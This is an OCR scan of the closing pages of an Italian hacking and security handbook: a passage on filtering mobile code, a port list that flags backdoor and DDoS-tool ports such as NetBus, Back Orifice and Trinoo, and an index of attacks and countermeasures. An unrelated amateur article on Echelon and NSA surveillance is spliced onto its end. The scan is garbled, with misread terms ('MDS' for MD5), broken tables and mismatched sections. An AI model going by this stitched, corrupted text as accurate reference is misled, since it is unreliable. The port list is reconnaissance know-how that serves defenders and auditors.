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firewall per combattere molti dei problemi trattati in questo capitolo; in particolare 
dovete prestare attenzione alle liste di controllo degli accessi in uscita, che possono 
fornire un'importante barriera contro il codice pericoloso che cerca di connettersi a 
server gestiti da hacker posizionati all’esterno del perimetro della rete. 

In aggiunta sono disponibili molti prodotti che sottopongono a scansione la posta 
elettronica o il traffico Web in ingresso per intercettare il codice sospetto: un esem- 
pio è la tecnologia SurfinGate di Finjan (http://ww.finjan.com), che si colloca 
sul confine della rete (sotto forma di plug-in per i firewall esistenti o come proxy) e 
controlla tutti i file Java, ActiveX, JavaScript, eseguibili, Visual Basic Script, plug-in e 
cookie per costruire un profilo di comportamento basato sulle azioni richieste da 
ogni modulo di codice. Il modulo viene poi identificato in modo esclusivo con un 
hash MDS così ripetitivo che gli scaricamenti dello stesso modulo necessitano di 
una sola scansione. SurfinGate confronta il profilo di comportamento con un crite- 
rio di protezione concepito dall’amministratore di rete e poi prende la decisione di 
autorizzare o bloccare in base all'intersezione del profilo con il criterio. 

Finjan rende disponibile anche una versione personale di SurfinGate chiamata Sur- 
finGuard, che offre un ambiente sandbox nel quale eseguire il codice scaricato. 
Quella di Finjan è un'interessante tecnologia che allontana dai confusi e poco infor- 
mati utenti finali il problema della gestione del codice mobile. La sua tecnologia 
sandbox ha inoltre il vantaggio di riuscire a impedire gli attacchi da parte dei com- 
pressori PE (Portable Executable, eseguibili portabili). Essi possono comprimere i 
file .EXE Win32 e modificano effettivamente la firma binaria dell'eseguibile. L’ese- 
guibile compresso che ne risulta può aggirare qualunque motore di scansione anti- 
virus statico perché il file .EXE non viene estratto al suo stato originale prima di es- 
sere eseguito (e pertanto il tradizionale controllo delle firme degli antivirus non lo 
rileva). Ovviamente però la sua validità è legata al criterio 0 ai parametri di prote- 
zione tramite sandbox su cui si fonda, che sono configurati sempre dai soliti esseri 
umani responsabili di tanti degli errori che abbiamo trattato in questo capitolo. 
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Appendice A 
Porte 


La disponibilità di un elenco preciso delle porte e dei rispettivi proprietari può rive- 
larsi fondamentale per identificare le falle nei sistemi; infatti, uno degli ostacoli 
maggiori da superare è comprendere quali oggetti sono presenti sulla rete. La scan- 
sione di tutte le 131.070 porte (da 1 a 65535 sia per TCP sia per UDP) su ogni host 
potrebbe richiedere intere giornate, mentre un elenco di porte selezionate può con- 
sentire se non altro di eliminare i bersagli più immediati. 

L'elenco seguente non pretende di essere esaustivo, in quanto alcune delle applica- 
zioni riportate possono essere configurate in modo da mettersi in ascolto su porte 
completamente diverse, ma è pur sempre un buon punto di partenza per identificare 
eventuali applicazioni non autorizzate. Le porte incluse in questo elenco sono quelle 
maggiormente utilizzate per raccogliere informazioni o ottenere l’accesso ai sistemi 
informatici. Per un elenco completo delle porte potete visitare l'indirizzo http:// 
ww.iana.org/assignments/port-numbers. 


Servizio o applicazione Porta/Protocollo 
echo 7/tcp 

systat 11/tcp 
chargen 19/tcp 
fip-data 21/tcp 

ssh 22/tcp 
telnet 23/tcp 
SMTP 25/tcp 
nameserver 42/tcp 
whois 43/tcp 
tacacs 49/udp 
xns-time 52/tcp 
xns-time 52/udp 
dns-lookup 53/udp 
dns-zone 53/tcp 
whois++ 63/tcp/udp 
bootps 67/tcp/udp 
bootps 68/tcp/udp 


oracle-sglnet 606/ tcp 
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Servizio o applicazione Porta/Protocollo 
tftp 69/udp 
gopher 70/tcp/udp 
finger 79/tcp 

http 80/tcp 
alternate web port (http) 81/tcp 
kerberos or alternate web port (http) 88/tcp 

pop2 109/tcp 
pop3 110/tcp 
sunrpe 111/tcp 
sqlserv 118/tcp 
nntp 119/tcp 

ntp 123/tcp/udp 
ntrpc-or-dce (epmap) 135/tcp/udp 
netbios-ns 137/tcp/udp 
netbios-dgm 138/tcp/udp 
netbios 139/tcp 
imap 143/tcp 
snmp 161/udp 
snmp-trap 162/udp 
xdmcp 177/tcp/udp 
bgp 179/tcp 
snmp-checkpoint 256/tcp 

ldap 389/tcp 
netware-ip 396/tcp 
timbuktu 407/tcp 
https/ssl 443/tcp 
ms-smb-alternate 445/tcp/udp 
ipsec-internet-key-exchange(ike) 500/udp 
exec 512/tcp 
rlogin 513/tcp 
rwho 513/udp 
rshell 514/tcp 
syslog 514/udp 
printer 515/tcp 
printer 515/udp 

talk 517/tcp/udp 
ntalk 518/tcp/udp 
route 520/udp 
netware-ncp 524/tcp 
irc-serv 529/tcp/udp 
uucp 540/tcp/udp 
klogin 543/tcp/udp 
mount 645/udp 
remotelypossible 799/tcp 


rsyne 873/tcp 


Porte 655 


Servizio o applicazione 
samba-swat 
w2k rpc services 


kpop 

socks 
bmc-patrol-db 
notes 
timbuktu-srv1 
ms-sql 

citrix 
sybase-sql-anywhere 
funkproxy 
ingres-lock 
oracle-srv 
oracle-tli 

PPIp 
winsock-proxy 
radius 
remotely-anywhere 
cisco-mgmt 

nfs 
compag-web 
sybase 
openview 
realsecure 
nessusd 

cemail 
ms-active-dir-global-catalog 
bmc-patrol-agent 
mysql 

ssql 
ms-termserv 
cisco-mgmt 
nfs-lockd 
rwhois 
postgress 
secured 
pcanywhere 
vne 

ven-java 
xwindows 
cisco-mgmt 
arcserve 

ape 


Porta/Protocollo 


901/tcp 
1024-1030/tcp 
1024-1030/udp 
1109/tcp 
1080/tcp 
1313/tcp 
1352/tcp 
1417-1420/tcp/udp 
1433/tcp 
1494/tcp 
1498/tcp 
1505/tcp/udp 
1524/tcp 
1525/tcp 
1527/tcp 
1723/tcp 
1745/tcp 
1812/udp 
2000/tcp 
2001/tcp 
2049/tcp 
2301/tcp 
2368 
2447/tcp 
2998/tcp 
3001/tcp 
3264/tcp/udp 
3268/tcp/udp 
3300/tcp 
3306/tcp 
3351/tcp 
3389/tcp 
4001/tcp 
4045/tcp 
4321/tcp/udp 
5432/tcp 
5500/udp 
5631/tcp 
5800/tcp 
5900/tcp 
6000/tcp 
6001/tcp 
6050/tcp 
6549/tcp 


irc 6667/ tcp 
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Servizio o applicazione 


font-service 

web 

web 

web 

web 

blackice-icecap 
cisco-xremote 
jetdirect 

dragon-ids 

iss system scanner agent 
iss system scanner console 
stel 

netbus 

trinoo_bcast 
trinoo_master 
quake 

backorifice 
rpc-solaris 
snmp-solaris 
reachout 

bo2k 

bo2k 
netprowler-manager 
pcanywhere-def 


Porta/Protocollo 


7100/tcep/udp 
8000/tcp 
8001/tcp 
8002/tcp 
8080/tcp 
8081/tcp 
9001/tcp 
9100/tcp 
9111/tcp 
9991/tcp 
9992/tcp 
10005/tcp 
12345/tcp 
27444/tcp 
27665/tcp 
27960/udp 
31337/udp 
32771/tcp 
32780/udp 
43188/tcp 
54320/tcp 
54321/udp 
61440/tcp 
65301/tcp 


Appendice B 
I 14 punti più vulnerabili 


4. L'esecuzione 
di servizi 

non necessari, 
(come RPC, FTP. 
DNS o SMTP) 

su alcuni host 
lascia aperte 

altre vie di accesso. 


Server Internet interni 


esi 


13. Funzionalità di registrazione, 
monitoraggio e intercettazione 
non adeguare sulla rete 

e sui singoli host. 


Server 
di accesso remoto 


2. | punti di accesso remoto non 
protetti e non controllati 
costituiscono una delle vie di 
inte aziendale. utenti telefonici 
mobile/domestico si Sh a internet con 
una bassa protezione, 
esponendo ad attacchi i file sensibili. a sistemi delicati. 
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.NET Framework, 203 
802.1x, 449 


a 


accesso non autenticato al proxy esterno, 
468 
accodamento nei file, 591 
Achilles, 580 
ACK value (valore ACK), 55 
ACL (Access Control List), 28, 464 
acquisizione degli hash, 176 
ActiveX, controlli, 518 
AD (Active Directory), 97 
AiroPeek NX, 435 
AirSnort, 445 
analisi dei record MX (mail exchange), 26 
antivirus, aggiornamento del, 648 
APS NTLM, 586 
aree di protezione, 601-604 
ARIN (American Registry for Internet 
Numbers), 19 
ARP, reindirizzamento, 385-388 
ATT Definity G/System 75, 357 
attacchi 
all'algoritmo WEP, 444 
con file inviati tramite DCC, 647 
di spoofing (Pandora), 233 
di tipo buffer overflow a un controllo 
ActiveX di un client Web, 518 
attacchi a IIS 
attraversamento delle directory, 163 
di tipo buffer overflow, 165 
divulgazione di informazioni, 162 


attacchi a SSH (Secure SHelD) 
analisi del traffico, 551 
MITM (Man-m-The-Middle), 551 
recupero della chiave, 552 
attacchi a Terminal Server 
annullamento dei criteri di protezione 
di gruppo, 519 
buffer overflow di RegAPI.dIl, 515 
ICA Weak encryption, 516 
IME Remote root compromise, 516 
in Windows NT 4.0, 494 
per alterazione dei privilegi utente, 
517 
attacchi ai sistemi di messaggistica vocale 
con il metodo della forza bruta, 
359-363 
attacchi alla posta elettronica 
con il flag “safe for scripting”, 621-623 
intercettazione della funzione Salva 
con nome di Excel/PowerPoint, 
639 
introduzione forzata di allegati, 641 
nascondere l’estensione degli allegati 
inserendo molti spazi, 637 
raccolta di credenziali NTLM 
con telnet, 645 
tecniche per convincere a scaricare 
un allegato, 638 
tramite file scrap allegati, 636 
utilizzo cli IFRAME per scrivere 
allegati in TEMP, 642 
attacchi CSS (attacchi XSS), 589 
attacchi di canonicalization 
a IIS 5, 563 
a pagine ASP, 562 
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attacchi DoS, 448 
ai DNS (Domain Name Server), 476, 483 
difetti di programmazione, 475 
esaurimento della larghezza di banda, 
474 
esaurimento delle risorse, 475 
generici, 476 
motivazioni, 473 
tipi di, 474-476 
attacchi DoS distribuiti, 488 
Stacheldraht, 491 
TEN (7ribe Flood Network), 489 
TFN2K, 492 
Trinoo, 490 
WinTrinoo, 493 
attacchi DoS locali, 493 
a Terminal Server e proquota.exe 
in Windows NT 4.0, 494 
kernel panic, 494 
attacchi DoS remoti, 484 
ad Administrator di ColdFusion, 487 
con buffer overflow al server FTP 
di IIS, 486 
memory leak dello spool di Windows 
NT, 485 
pipe con nome su RPC, 485 
ricostruzione dei pacchetti IP 
frammentati, 484 
SMBdie, 485 
stream e raped, 486 
attacco a openfile.cfm, 573-575 
attrib, applicazione DOS, 197 
auditing, 155 
disabilitazione del, 196, 244 
autenticazione doppia 
numero illimitato di tentativi, 351 
numero limitato di tentativi, 352 
autenticazione singola 
numero illimitato di tentativi, 346-349 
numero limitato di tentativi, 349 
AZPR (Advanced Zip Password Recovery), 
138 


b 


Back Orifice, 533 

backdoor, 125, 185-190, 193, 246, 525-547 
Back Orifice (BO), 125 
NetBus, 127 
SubSeven (S7S), 128 


Bellovin, 367 
BGP (Border Gateway ProtocoD), 407, 476 
BIND (Berkeley Internet Name Domain), 
283 
bindery, 212 
bindin, 212 
BIOS (Basic Input Output System), 132 
bit DF (Don Fragment), 55 
BlackICE Defender, 131 
blocco 
dei trasferimenti di zona DNS 
in Win 2000, 69 
dell’enumerazione del servizio nomi 
NetBIOS, 78 
Bogus Flag probe (sonda con flag fasullo), 


Brown Orifice, 607 
buffer overflow, 165, 256, 274, 486, 515, 
518, 565-575, 626 


[si 


CAIN, 137 
campionamento ISN, 55 
canali di ritorno, 266 
cattura 
dei banner, 64-66, 380, 455 
di pacchetti, 429 
CDP, 390 
centralino Williams, 356 
certificato SSL del browser Web, 616 
CheckPoint, 464 
chknull, 217 
CIDR (Classless Inter- Domain Routing), 
44 
cifratura delle trasmissioni (SSH, IPSec) 
in UNIX, 311 
Cisco 
cifratura debole, 399 
enumerazione e cattura dei banner, 
380 
Virtual Terminal Ports, 380 
XRemote (9001), 381 
Citrix ICA, 511-521 
configurazione di schede wireless 
in Linux, 430 
connessioni da Client32 Novell, 102 
connessioni telefoniche, misure 
di sicurezza, 353 


consultazione di file, 471 
contraffazione di pacchetti RIP, 402-405 
ControlIT 4.5, 502 
controllo 

degli accessi MAC, 442 


dei dati disponibili al pubblico, 14, 22 


controllo remoto, 499-521 
dell’interfaccia grafica, 187 
punti deboli del, 501 
ricerca dei software di, 499 

contromisure 
a Back Orifice 2000, 534 
a Brown Orifice, 608 
a chknull, 218 
a codebvrws.aso, 561 
a dsniff, 395 
a Dstumbler, 424 
a DWEPCrack, 448 
a finger, 71 
a Firewalk, 462 
a IIS 4.0 IISHack, 568 
a Kismet, 423 
a NetStumbler, 422 
a Nwperack, 226 
a Pandora, 235 
a rwho e rusers, 108 
a showcode.asp, 561 
a SMBdie, 485 
a Smurf, 478 
a Stacheldraht, 491 
a TFN, 490 
a TFN2K, 492 
a Traceroute, 455 
a Trinoo, 491 
a WinTrinoo, 493 
a WLAN-Tools, 447 
a Write Net MIB per Cisco, 398 
a XSS, 613 
ad AirSnort, 446 
a HK, 173 


agli allegati con estensione nascosta, 


638 
agli attacchi a forza bruta, 254 


agli attacchi a forza bruta dei sistemi 


di messaggistica vocale, 363 
agli attacchi a IIS, 166-170 
agli attacchi a NFS in UNIX, 280 
agli attacchi a RPC in UNIX, 273 


agli attacchi agli handler dei segnali, 


300 
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agli attacchi al Server di Accesso 
Remoto di Windows 9x, 123 

agli attacchi basati sull’ingegneria 
sociale, 557 

agli attacchi che comportano la 
scrittura di file Excel/PowerPoint, 
641 

agli attacchi DoS al server FTP di IIS, 
486 

agli attacchi DoS stream e raped, 487 

agli attacchi in modalità promiscua 
in UNIX, 292 

agli attacchi telnet, 646 

agli strumenti di analisi automatica, 61 

ai buffer overflow in UNIX, 257-260 

ai buffer overflow locali in UNIX, 297 

ai canali di ritorno in UNIX, 268 

ai file scrap, 637 

ai tentativi di ricerca delle password, 
149-158 

ai trojan in UNIX, 307 

al buffer overflow di RegAPI.dll, 516 

al buffer overflow di SNMP in UNIX, 
275 

al buffer overflow di un controllo 
ActiveX di un client Web, 518 

al controllo remoto, 189 

al cracking delle password, 182 

al Denial of Service, 131 

al furto dei file NDS, 241 

al furto di informazioni, 225 

al kernel panic, 495 

al leak dello spool di Windows NT, 
486 

al mascheramento debole 
della password VNC, 511 

al ping sweep, 36 

al recupero della chiave 
di una sessione SSH, 552 

al reindirizzamento ARP, 387 

al riconoscimento del sistema 
operativo, 57 

al rilevamento dei servizi, 378 

al rootkit, 553 

al rootkit del kernel in UNIX, 316 

al telnet non autenticato, 470 

al tracerouting, 372 

al trojan FPNWCLNT, 550 

all'enumerazione mediante BGP, 97 

all'enumerazione RPC, 107 

all'attacco SYN Flood, 481 
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scaricamento di file di Active Setup, 
600 
Schneier, 366 
script di forza bruta 
autenticazione doppia 
numero illimitato di tentativi, 
351 
numero limitato di tentativi, 
352 
autenticazione singola 
numero illimitato di tentativi, 
346-349 
numero limitato di tentativi, 
349 
Low-Hanging Fruit, 345 
Security Log, 155 
segnali, 299 
sendmail, 270 
servizi RPC, 271 
Servizio Registro Remoto, 124 
Sessioni nulle, 79 
show ip bgp, 374 
ShoWin, 135 
sicurezza 
appsec.exe, 520 
problemi di Java, 604-608 
tsver.exe, 520 
SMBdie, 485 
Smurf, 477 
snarfing, 609 
sniffer, 308, 525 
definizione di, 308 
funzionamento degli, 309 
intercettazione degli, 311 
più diffusi, 310 
wireless, 429 
sniffing di uno switch di rete, 384 
snlist, 209 
SNMP (Simple Network Management 
Protocol), 125 
buffer overflow, 274 
software di analisi del Web 
Offline Explorer Pro, 578 
wget, 578 
software per la valutazione 
delle applicazioni Web 
Achilles, 580 
APS NTLM, 586 
Form Scalpel, 583 
NTOMax, 585 
SPIKE, 585 


SPIKE Proxy, 581 
WASAT, 585 
WebProxy, 582 
WebSleuth, 580 
software per mapping wireless 
GPSMap, 425-427 
JIGLE, 427 
StumbvVerter, 425 
software per wardialing 
PhoneSweep, 338-341 
tecniche di attacco delle portanti, 
342 
TeleSweep Secure, 341 
THC-Scan, 335-338 
ToneLoc, 331-335 
software per war-driving 
Dstumbler, 423 
Kismet, 422 
NetStumbler, 420 
sonda con flag fasullo (Bogus Flag probe), 
35 
sonda FIN, 55 
SPIKE, 585 
SPIKEProxy, 581 
SQL injection, 586-588 
SSBypass, 134 
SSH (Secure SHelD), 551 
SSI (Server Side Include), 590 
SSID, 437 
Stacheldraht, 491 
STP, 391 
streaming dei file di NTFS, 197 
strobe, 41 
strumenti di analisi automatica, 60 
strumenti di scansione delle porte basati 
su Windows, 46 
StumbVerter, 425 
SuperScan, 47 
SYN Flood, 480 


t 


tag nascosti, 590 

TCP ACK scan (scansione TCP via ACK), 
40 

TCP connect scan (scansione TCP con 
connessione), 39 


TCP FIN scan (scansione TCP via FIN), 
40 

TCP initial window size (dimensione della 
finestra iniziale TCP), 55 

TCP Null scan (scansione TCP nulla), 40 

TCP options (opzioni TCP), 56 

TCP RPC scan (scansione TCP via RPC), 
40 

TCP SYN scan (scansione TCP via SYN), 
39 

TCP Windows scan (scansione TCP con 
Windows), 40 

TCP Xmas Tree scan (scansione TCP ad 
albero di Natale), 40 

TCPDump, sniffer 393 

tcpdump, tool 433 

TDS (Trojan Defense Suite), 130 

TeleSweep Secure, 341 

telnet 
inverso, 266, 536 
non autenticato, 470 

Terminal Server, 494, 511-521, 539 

TFN (7ribe Flood Network), 489 

TFN2K, 492 

TFTP, 401 

THC-Scan, 335-338 

threshold logging, 53 

ToneLoc, 331-335 

tool di attacco a WEP 
AirSnort, 445 
DWEPCrack, 447 
WLAN-Tools, 447 

tool di enumerazione a sessione nulla, 
85-87 

tool di monitoraggio wireless 
AiroPeek NX, 435 
Ethereal, 434 
prism2dump, 432 
tcpdump, 433 

TOS (Type Of Service), 55 

traceroute, 27-30, 371, 373, 454 
con informazioni ASN, 373 

tracerouting, 27-30 

trasferimento di zona, 23, 68 

trasmissione di pacchetti di dati raw, 
459 

Trinoo, 490 

trojan, 307, 534, 547, 549, 550, 553 
FPWNCLNT.DLL, 549 
getem.exe, 567 
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TSEnum, 514 

TSProbe, 513 

tsver.exe, 520 

TTDB (700/7alk Database), 107 
tunneling, 364, 466 


u 


UDP (User Datagram Protocol), 28 
UDP scan (scansione UDP), 40 
udp_scan, 42 
Unhide, 135 
UNIX 
accesso locale, 292-306 
accesso remoto, 252-292 
attacchi locali 
autorizzazioni di accesso a file 
e directory, 303 
buffer overflow locale, 296 
pulizia dei file di log, 311-314 
rootkit del kernel, 314 
sniffer, 308 
Symlink, 298 
attacchi remoti 
ad Apache, 290 
al formatto delle stringhe, 260 
buffer overflow, 256 
buffer overflow di SNMP, 274 
con il metodo della forza bruta, 
253 
data driven, 255 
di validazione dell'input, 262 
DNS, 283 
DNS TSIG, 285 
FTP (File Transfer Protocol), 
269 
in modalità promiscua, 291 
NFS (Network File System), 
275-280 
Operation X, 265 
overflow di OpenSSL, 288 
sendamil, 270 
servizi RPC, 271 
telnet inverso e canali di ritorno, 
266 
carenze di sicurezza di SSH, 287 
carenze di sicurezza di X, 280 
configurazioni non corrette 
del sistema, 302 
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mappa dei punti vulnerabili, 250 
vulnerabilità della procedura 
di Challenge-Response 
in OpenSSH, 287 
vulnerabilità dovute alla scelta 
delle password, 293 
upload dei profili utente, 503 
userdump, 211 
userinfo, 210 
userlist /a, 220 


Vv 


valore ACK (ACK value), 55 
violazione 
della protezione di SSL, 615 
di Check Point, 464 
Virtual Terminal Ports, 380 
visualizzazione delle informazioni sul 
server Web di Novonyx per NetWare 
5, 230 
VLAN, 388 
VNC (Virtual Network Computing), 508 
VP (AntiViral Toolkit Pro), 130 
VPN (Virtual Private Network), 124 
VTP, 391 
vulnerabilità 
dei frame HTML di Internet Explorer, 
614 
dei proxy applicativi, 467-471 
dei proxy applicativi 
localhost, 467 
dei server Web, 575 
dell’overflow dei campi Web, 569-571 
delle applicazioni Web, 586 
delle reti, 381-384 
di codebrws.asp, 560 
di Cold Fusion, 572 
di Eudora, 631 
di IIS 5, 563 
di pagine ASP, 562 
di PHP, 565 
di showcode.asp, 560 
di Web DAV, 562 
di WinGate, 469 
di wwwcount.cgi, 566 
IISHack per IIS 4.0, 566 
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wardialer, 325 
wardialing 
aspetti legali del, 329 
costi accessori del, 329 
hardware, 328 
WASAT, 585 
WebProxy, 582 
WebSleuth, 580 
WEP, 443-448 
protezione, 445 
wget, 578 
Whack-A-Mole, 548 
Whisker 2.0, 575 
Win Trinoo, 493 
Windows 9x 
attacchi locali, 132 
crack dei file PWL, 136 
elusione dei dispositivi 
di sicurezza, 132 
esecuzione automatica 
ed estorsione della password 
dello screensaver, 133 
lettura della password giacente 
in memoria, 135 
attacchi remoti, 118-131 
connessione diretta alle risorse 
condivise, 119 
Denial of Service, 131 
hacking dei file e delle stampanti 
condivise, 119 
hacking dei server di Accesso 
Remoto, 122 
registro di sistema, 124 
ripetizione dell’hash 
di autenticazione, 122 
strumenti di amministrazione 
della rete, 125 
Windows Millennium Edition (Me) 
attacchi da postazioni remote, 138 
attacchi locali, 139 
recupero delle password 
dalle cartelle compresse, 
139 
Windows NT 
attacchi con autenticazione 
contraffazione delle richieste LPC 
Ports, 172 
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previsione delle named pipe 
come SYSTEM, 173 
ricerca di privilegi, 171 
attacchi senza autenticazione 
attacchi SMB (Server Message 
Block), 144 
intercettazione del traffico 
di autenticazione di rete, 
158-160 
ricerca della password, 144-149 
trojan FPWNCLNT.DLL, 549 


WinGate, 469 

WinScan, 49 

WinVNC 
cancellazione di chiavi, 190 
mascheramento debole 

delle password, 510 

WLAN-Tools, 447 

worm ILOVEYOU, 634 

WU (Windows Update), 602 
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WUPS (Windows UDP Port Scanner), 50 


Finito di stampare nel mese di Ottobre 2003 
da Legoprint Lavis (TN) 


Echelon-Il grande orecchio 


L'argomento non è molto complesso, però mi è sembrato giusto dividere l' articolo in varie 
parti per facilitarne la lettura. 

Quello che leggerete sarà frutto di una rielaborazione di articoli apparsi sulla rete, anche 
se il cut&paste l' ho usato solo per alcune parti in cui non c' era davvero nulla da 
modificare. 

Enjoy! 

{Cujo} 


Introduzione 


AI giorno d' oggi, la privacy sembra essere uno dei valori fondamentali per l' esistenza di 
una persona. Si è addirittura arrivati ad istituire un garante che vigilasse sulle eventuali 
violazioni di questo diritto.Per questo la messa in onda di trasmissioni come “The big 
brother” o “Survival” scandalizzano l' opinione pubblica.In realtà la vita quotidiana non è 
molto diversa, basti pensare alle centinaia di telecamere di sicurezza che ci filmano nelle 
banche o nei negozi, ma i benpensanti e la società bigotta continuano ad ostentare la loro 
ottusità.Per quanto riguarda l' ambito delle comunicazioni le cose sono messe anche 
peggio.Dubito che molti di voi non sappiano cosa sia Echelon, dato che nelle settimane 
passate ha scatenato molteplici polemiche.Echelon non è nient' altro che quello che i 
paranoici temevano ( speravano? ) da molto tempo.E' vero, esiste un sistema di sicurezza 
che è capace di captare qualsiasi tipo di comunicazione, sia essa telefonica o telematica ( 
e-mai e fax in cima alla lista ). 


The story so far..... 


La “ nostra cara “ NSA lavora da anni a questo progetto, e la sua esistenza non è 
assolutamente oscura alle alte cariche Stato.Pensate solo che la “ Lady di Ferro” Margaret 
Thatcher utilizzava questa enorme rete di ricezione per spiare i suoi collaboratori.Durante 
la campagna elettorale dell' 83, infatti, si rivolse all' Intelligence service e il famoso “ Mister 
M “( no, non è una leggenda di 007, esiste davvero! =) ) si rivolse ai partner canadesi del 
Cse che insieme ad australiani e neozelandesi si stabilirono in un locale superprotetto a 
Londra dove installarono la loro base operativa. 


Solamente in questi ultimi tempi, però, cominciano a venire a galla le prime dichiarazioni 
da parte dei diretti interessati. 


L'Electronic Privacy Information Center (EPIC) [un centro di ricerca nato a Washington nel 
1994 per sensibilizzare l'attenzione sulle libertà civili e la tutela della privacy, che si 
appoggia al FOIA. n.d. Me ;-) ] ha chiesto il 3 dicembre scorso ad un tribunale federale di 
disporre la diffusione di documenti controversi relativi a possibili attività di sorveglianza 
condotte su cittadini americani. La causa promossa dall'EPIC intende giungere alla 
pubblicazione di documenti riservati della NSA (National Security Agency) nei quali si 
analizzano i presupposti giuridici delle attività di sorveglianza effettuate dal servizio di 
sicurezza americano. 


La NSA aveva rifiutato, all'inizio dell'anno, di fornire questa documentazione alla 
Commissione parlamentare sui servizi segreti, e ciò aveva portato ad una censura 
pubblica (fatto insolito) dell'agenzia di spionaggio. Il deputato Porter J. Goss, presidente 
del collegio di controllo, scrisse in una relazione della Commissione pubblicata a maggio 
che la motivazione con cui la NSA aveva giustificato il rifiuto di fornire le osservazioni 
giuridiche in oggetto era "poco convincente e opinabile". Rilevava che se i legali della NSA 
"interpretano in modo eccessivamente permissivo i poteri della NSA, potrebbero nascerne 
pericoli per il diritto alla privacy dei cittadini USA". A breve distanza dalla pubblicazione 
della relazione della Commissione, EPIC ha presentato alla NSA una richiesta di 
esibizione della documentazione in oggetto ai sensi della Legge sulla libertà di 
informazione (FOIA). Nonostante il FOIA fissi un limite di 20 giorni lavorativi per la 
risposta, la NSA non ha ottemperato alla richiesta dell'EPIC. 


Il direttore dell'EPIC, Marc Rotenberg, ha dichiarato che "lo statuto della NSA non 
consente la raccolta di informazioni su privati cittadini. Tuttavia, abbiamo ragione di 
credere che la NSA stia acquisendo e intercettando in modo indiscriminato comunicazioni 
private condotte via Internet". 


Da qualche tempo le attività di sorveglianza della NSA sono seguite con maggiore 
attenzione, e secondo alcuni studi la NSA sta coordinando una grossa iniziativa di 
intercettazione a livello mondiale denominata ECHELON. Nell'ultimo numero del The New 
Yorker Magazine, si afferma che alla NSA sono bastati 11 mesi di registrazioni del traffico 
su Internet per esaurire una capacità di memoria progettata per durare tre anni. 


Il fondamento giuridico delle attività di intercettazione della NSA costituisce un tema 
chiave che EPIC intende esaminare in un ampio studio che verrà pubblicato all'inizio del 
prossimo anno. 


Lo studio sarà condotto da Duncan Campbell, giornalista e produttore televisivo scozzese. 
All'inizio di quest'anno, Campbell è stato nominato consulente del Parlamento europeo ed 
ha preparato un'analisi su ECHELON e l'attività di sorveglianza delle comunicazioni, in cui 
erano contenute le prime prove documentarie del sistema di sorveglianza globale. Nei 
prossimi mesi Campbell collaborerà con EPIC all'elaborazione di un rapporto che sarà 
presentato durante le audizioni che si prevede terrà il Congresso in materia di servizi 
segreti, quarto emendamento e diritti dell'uomo. 


The story so far...#2 


Nessuno ne parla. | documenti sono stati cancellati dalla banca dati. Ma Bruxelles sta 
studiando un protocollo per le intercettazioni. Le uniche tracce le ha trovate una rivista 
telematica tedesca. E subito è scoppiata la polemica. 


La denuncia di Barr è fondata. Nelle scorse settimane, dopo una coraggiosa campagna 
stampa del quotidiano Ekstra Bladet, la Danimarca è stato il primo paese europeo ad 
ammettere il coinvolgimento fin dal 1950 nel progetto Echelon, seppure come "parte 
terza": scambia cioè le informazioni solo dopo l'assenso americano e successivamente 
quello degli altri quattro alleati. E l'Italia? Il comitato di controllo sui servizi segreti sta 
ancora indagando, così come sta cercando di scoprire qualcosa la procura di Roma. Nel 
rapporto di Campbell al Parlamento europeo c'è però già una prima importante 
indicazione: la base Usa di San Vito dei Normanni, in Puglia, viene utilizzata dal '64 per le 
intercettazioni radio ad alta frequenza assieme a quella di Chicksands, in Inghilterra, e 
Karamursel, in Turchia. "Non c'è dubbio che Echelon opera in violazione delle leggi 


europee sulla privacy" sostiene David Soble, direttore dell'Electronic privacy information 
center. "Questa è la preoccupazione principale. Poi, naturalmente, c'è lo spionaggio 
economico". 


La guerra fredda aveva fatto crescere a dismisura la Nsa e le agenzie collegate. Il crollo 
del Muro di Berlino le ha gettate nel panico, senza più una missione per giustificarne 
l'esistenza e il ricco budget. "Prima l'amministrazione di George Bush e poi quella di Bill 
Clinton sono corse in aiuto riuscendo a trovare il nuovo nemico: non più i comunisti, ma i 
capitalisti competitori" dichiara a Panorama Patrick Poole, il maggiore esperto di 
sorveglianza elettronica. "Per i due presidenti si è trattato solo della naturale estensione 
del concetto che ciò che è buono per l'industria americana è buono anche per gli Usa. 


| casi citati nei rapporti presentati al Parlamento europeo sono numerosi. Si parte dal 
1993, con la testimonianza di Howard Teicher, un ex funzionario del National security 
council americano, il quale ha rivelato che la stazione di Menwith Hill aveva messo nel 
mirino il consorzio europeo Panavia per le vendite dei Tornado in Medio Oriente. Un anno 
dopo, la Nsa intercettò alcune telefonate fra i manager della società francese Thomson- 
Csf e le autorità governative brasiliane per la vendita di un sistema radar Sivam, del valore 
di 1,3 miliardi di dollari, destinato all'Amazzonia. Nelle telefonate si accennava alle 
tangenti da pagare ad alcuni ministri. L'amministrazione Clinton informò la Raytheon 
corporation, una delle aziende legate al progetto Echelon, che fu in grado di fare un'offerta 
migliore e di vincere il ricco contratto. 


Nel 1995 da un satellite commerciale di comunicazioni la stazione di ascolto inglese riuscì 
a intercettare i fax e le telefonate fra il quartier generale del consorzio europeo Airbus, la 
compagnia di bandiera saudita e alcuni principi della monarchia guidata da re Fahd. | 
contatti riguardavano l'acquisto degli aerei europei. L'informazione fu subito trasmessa a 
Boeing e McDonnell Douglas, che, nemmeno a dirlo, alla fine hanno trionfato: nel 1998 si 
sono aggiudicate l'affare con un contratto di 6 miliardi di dollari. 


Nel documento di Campbell ci sono nomi, date, luoghi, tecniche del Grande orecchio: la 
costante intercettazione dei diplomatici italiani e francesi dalle centrali di Chicksands e 
Cheltenhem, in Gran Bretagna, lo spionaggio sulle ricerche che riguardavano gli standard 
di emissione delle auto giapponesi, il monitoraggio sui negoziati per le importazioni di 
vetture di lusso dal Giappone e su quelli per il Gatt attraverso il controllo delle telefonate 
tra il presidente francese Frangois Mitterrand e quello della commissione europea, 
Jacques Delors. 


Nemmeno il ricorso alla decrittazione evita di essere spiati. Nei documenti presentati alla 
Commissione Ue si spiega come alcune società, fra cui Microsoft, Lotus e Netscape, 
hanno permesso al governo Usa di indebolire la codificazione dei propri software. Non 
solo: uno degli obiettivi più importanti della Nsa è stata un'azienda svizzera, la Crypto Ag, 
che fornisce i codici diplomatici e militari a più di 130 paesi. Gli 007 americani sono riusciti a 


infiltrare l'azienda direttamente attraverso il proprietario-fondatore, Boris Hagelin. 


E Internet? Anche la rete, simbolo di democrazia, è intrappolata: gli americani hanno 
bloccato nove centrali strategiche di smistamento di Internet con software in grado di 
controllare il traffico. Le stesse linee telefoniche sottomarine vengono costantemente 
monitorate, soprattutto quelle fra Europa e Africa sotto il Mediterraneo. (azz!) 

